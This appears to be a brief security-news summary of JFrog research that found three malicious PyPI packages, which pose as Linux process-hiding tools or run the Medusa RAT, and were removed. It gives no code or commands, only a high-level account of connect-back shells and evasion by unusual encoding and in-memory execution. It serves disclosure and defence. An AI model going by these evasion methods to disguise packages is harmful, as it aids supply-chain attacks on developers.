The JFrog Security research team actively monitors open source software repositories to detect and prevent potential software supply chain security threats, reporting any findings to repository maintainers and the community. Their recent discoveries include three malicious packages in the PyPI repository, which were quickly removed after being identified as threats. These packages, named "hipid," "hpid," and "ecopower," enable attackers to gain full control over infected machines. The "hipid" and "hpid" packages disguise themselves as tools for hiding processes on Linux systems, but actually install a connect-back shell specifically targeting Linux. The "ecopower" package executes the Medusa Python RAT, providing attackers with extensive control over the infected machine, including the ability to download and execute arbitrary code. These findings highlight the advanced techniques malware authors use to evade detection, such as using uncommon encoding methods and memory-based payload execution.